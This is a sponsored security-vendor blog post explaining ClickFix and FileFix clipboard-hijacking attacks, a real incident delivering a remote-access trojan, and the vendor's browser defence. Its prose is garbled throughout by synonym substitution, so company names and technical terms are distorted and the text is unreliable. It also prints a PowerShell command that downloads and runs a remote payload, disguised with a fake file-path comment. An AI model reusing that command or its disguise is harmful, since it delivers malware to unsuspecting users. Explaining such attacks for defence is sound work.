An inside take a look at a ClickFix marketing campaign and a real-world assault, its subsequent iteration (FileFix), and easy methods to forestall it in its tracks, earlier than system compromise.
ClickFix: Silent Copying to Clipboard
ClickFix, a misleading social engineering tactic, is utilized by menace actors to control unsuspecting customers into unwittingly permitting an online web page to silently populate the clipboard.
In the end, the attacker is making an attempt to get a person to (unknowingly) execute malicious code, gathered from the browser and quietly positioned into the person’s clipboard, on the host machine.
Coined initially as “ClickFix” as a result of the social engineering prompts had been telling the person they must “repair” an issue with their browser and required the person to click on a component, this time period is now ascribed to any related assault, one through which a person clicks a component, the web page then populates the sufferer’s clipboard, and it instructs the person to stick the malicious code into their system’s terminal.
The above screenshots present an instance ClickFix assault. As soon as the person clicks the pretend CAPTCHA, the web page silently populates the person’s clipboard with malicious code. It then shows directions for the person to show they’re human—by pasting (the malicious code) into the Home windows Run dialog.
For extra details about ClickFix, see our article explaining the what, why, the place, and the way of ClickFix.
Preserve Conscious, the purpose-built browser safety platform, detects misleading interactions in actual time, proper the place they occur.
By monitoring clipboard entry patterns, flagging suspicious net pages, and disrupting lateral motion strategies like ClickFix, Preserve Conscious empowers organizations to close down assaults earlier than they ever depart the browser and attain the host.
Actual-World Assault: Google Outcome to ClickFix Try
A Preserve Conscious buyer just lately encountered a ClickFix assault within the wild. Whereas searching search engine outcomes, the person clicked on a compromised web site. This web site, injected with malicious JavaScript, delivered a ClickFix immediate, in the end for the aim of deploying the NetSupportManager RAT backdoor.
The person had clicked on the immediate, permitting the web page to populate the clipboard (with malicious PowerShell), and instructing the person to stick into the system’s terminal.
Nevertheless, Preserve Conscious recognized, blocked, and warned the person of the suspicious instructions the web page tried to populate the clipboard with, successfully stopping system compromise.
The video beneath walks by what guests expertise on this compromised web site—a pretend CAPTCHA verification body. Upon clicking the pretend CAPTCHA, malicious JavaScript updates the person’s clipboard with malicious PowerShell code and prompts the person to stick it into the Home windows Run dialog.
Beneath is a walkthrough of what would have occurred if Preserve Conscious’s safeguards weren’t in place to restrict the person’s actions and clear the person’s clipboard.
If the social engineering tactic had been profitable and no technical controls had been in place, the person would have unknowingly executed malicious PowerShell code.
This kicks of a sequence of downloads, de-obfuscation, assembling malware on the host machine, and organising persistence within the person’s Run registry key—enabling the malware to persist on the compromised system and run every time the person logs in to their pc account.
For particular particulars about this real-world assault, together with each the preliminary obtain cradle and the next PowerShell code, try our step-by-step walkthrough.
Affect: RATs, Stealers, and Extra
ClickFix assaults use malicious JavaScript, clipboard manipulation, and social engineering to in the end achieve the attacker entry from the browser to the host system.
It has been seen on each malicious and compromised net pages and has been utilized by a number of menace teams to realize entry to sufferer machines, in the end deploying malware and distant entry trojans (RATs), together with AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate malware, DanaBot stealer, and extra.
When left undeterred by technical defenses, these seemingly easy clipboard assaults can escalate into full-system compromise, giving menace actors distant management, entry to delicate knowledge, and chronic footholds which can be tough to detect and even tougher to take away.
The Subsequent Gen: FileFix
FileFix is the following iteration, the youthful sibling, of ClickFix—one other clipboard-manipulation assault designed to trick customers into executing code outdoors the browser context. First documented by safety researcher mr.d0x in late June this yr, FileFix dupes customers into pasting instructions immediately into File Explorer’s tackle bar, and menace actors are already adopting this newer method.
At a look, the pasted output appears innocent, like a regular Home windows file path. However hidden at the beginning is a malicious command; the “file path” that follows is a remark, disguising the true menace.
Powershell.exe -c "iwr malicious[.]web site/mal.jpg|iex" # C:OrganizationInternalDriveBusiness-RFP.pdf
The total knowledge copied to the person’s clipboard is a malicious PowerShell command ending in a remark containing a file path.
Discover within the picture beneath, how the seemingly innocent file path within the Explorer’s tackle bar doesn’t present the precise PowerShell is hidden from the person’s view.
Like ClickFix, the FileFix assault originates within the browser and depends on social engineering, clipboard injection, and person motion to cross the boundary between browser and host. FileFix is, at its core, a ClickFix assault particular to utilizing File Explorer.
- Each occur within the browser context.
- Each use the identical clipboard inhabitants method.
- Each leverage malicious and compromised web sites, blurring the road between trusted and malicious net visitors.
- Each result in attacker entry on the host system.
Which means that FileFix will be stopped the identical means ClickFix is: with browser-native defenses. Browser safety options, like Preserve Conscious, detect clipboard inhabitants makes an attempt in real-time and intercept suspicious code earlier than it ever reaches the host system. This is the reason having insurance policies constructed into the browser ensures that compromises are stored at bay.
Browser Safety Takes the Foremost Stage
ClickFix and FileFix assaults reveal a essential blind spot in lots of safety methods: the browser as a vector for host compromise. These clipboard-based strategies use social engineering and abuse the person’s interplay with seemingly reputable, and even compromised, web sites to ship malicious code.
With out visibility into browser exercise or management over clipboard entry, conventional defenses miss the early indicators. However with browser-native perception and real-time clipboard safety, organizations can intercept these assaults at their supply, earlier than any code is executed on the host.
At Preserve Conscious, we’ve seen firsthand how conventional safety instruments fall brief in terms of defending the browser—the first interface staff depend on and attackers exploit. That’s why we constructed our platform: to detect and block clipboard manipulation and different browser-based assaults earlier than they will trigger actual hurt.
Fascinated by studying extra? Be at liberty to request a demo right here.
Moreover, we’re proud to be named considered one of simply 4 Black Hat USA 2025 Startup Highlight Finalists for innovation, and we stay dedicated to redefining how organizations safe and handle the browser—the place the place in the present day’s work begins, and the place in the present day’s assaults typically begin.
If you happen to’ll be attending Black Hat USA 2025 subsequent week, watch us take the stage to make our pitch, cease by the Preserve Conscious sales space, or schedule time to talk with the staff on the occasion.
Sponsored and written by Preserve Conscious.
